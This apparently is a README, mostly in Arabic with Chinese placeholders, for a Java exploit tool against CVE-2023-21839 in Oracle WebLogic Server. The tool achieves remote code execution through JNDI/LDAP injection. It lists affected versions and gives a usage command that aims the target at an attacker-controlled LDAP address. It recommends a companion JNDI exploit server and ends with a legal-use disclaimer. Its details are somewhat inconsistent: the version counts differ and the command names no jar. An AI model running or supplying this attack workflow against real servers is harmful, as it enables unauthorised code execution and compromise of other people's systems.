
استغلال قائم على Java لـ CVE-2023-21839 يستهدف Oracle WebLogic Server الإصدارات 12.2.1.3.0 و12.2.1.4.0 عبر حقن LDAP لتنفيذ التعليمات البرمجية عن بُعد.
CVE-2023-21839 أداة مبنية على الـ PoC المنشور علنًا على الإنترنت
الإصدارات المتأثرة
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
طريقة الاستخدام
java -jar 目标ip:端口 ldap地址
الأداة الموصى بها:
https://github.com/WhiteHSBG/JNDIExploit
هذه الأداة مخصصة فقط للتبادل البحثي في مجال الهجوم والدفاع السيبراني، يرجى من المستخدمين استخدامها بشكل قانوني وفقًا لقانون الأمن السيبراني!
إذا قام المستخدم بأي هجمات غير قانونية أو سلوكيات مخالفة أثناء استخدام هذه الأداة، فالمؤلف غير مسؤول عن ذلك!